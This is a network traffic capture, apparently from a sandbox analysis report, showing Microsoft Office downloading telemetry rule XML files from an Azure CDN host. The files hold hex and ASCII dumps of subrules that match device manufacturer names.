2024-11-30 11:48:11 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114811Z-174f78459684bddphC1EWRbht400000011400000000053k8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:11 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:11 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:11 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:11 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114811Z-174f7845968jrjrxhC1EWRmmrs00000011mg000000001n1c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:11 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49778	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:11 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:11 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:11 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 4ee01645-001e-0017-38b5-420c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114811Z-174f78459684db9fhC1EWRc7g400000001cg000000005gdw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:11 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:11 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:11 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:11 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 32f81047-301e-0051-4315-4138bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114811Z-174f7845968qj8jrhC1EWRh41s000000119g000000007511 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:11 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:13 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:13 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:13 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: ff709020-001e-005a-1caf-42c3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114813Z-174f7845968cdxdrhC1EWRg0en00000011a00000000070y9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:13 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:13 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:13 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:13 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114813Z-174f7845968zgtf6hC1EWRqd8s0000000ubg000000004r0y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:13 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49784	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:13 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:13 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:13 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 8b97b4d7-e01e-0003-5405-410fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114813Z-174f7845968pf68xhC1EWRr4h800000011h0000000008hqp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:13 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:13 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:13 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:13 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114813Z-174f7845968vqt9xhC1EWRgten00000011hg00000000070u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:13 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:13 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:13 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:13 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114813Z-174f78459685726chC1EWRsnbg00000011fg000000003eg7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:13 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49787	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:15 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:15 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:15 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114815Z-174f7845968kdththC1EWRzvxn0000000dq0000000007fnn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:15 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49788	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:15 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:15 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:15 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114815Z-174f7845968pf68xhC1EWRr4h800000011rg000000000ywe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:15 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49789	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-30 11:48:15 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-30 11:48:16 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 11:48:15 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241130T114815Z-174f7845968xr5c2hC1EWRd0hn0000000k7g00000000625b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-30 11:48:16 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
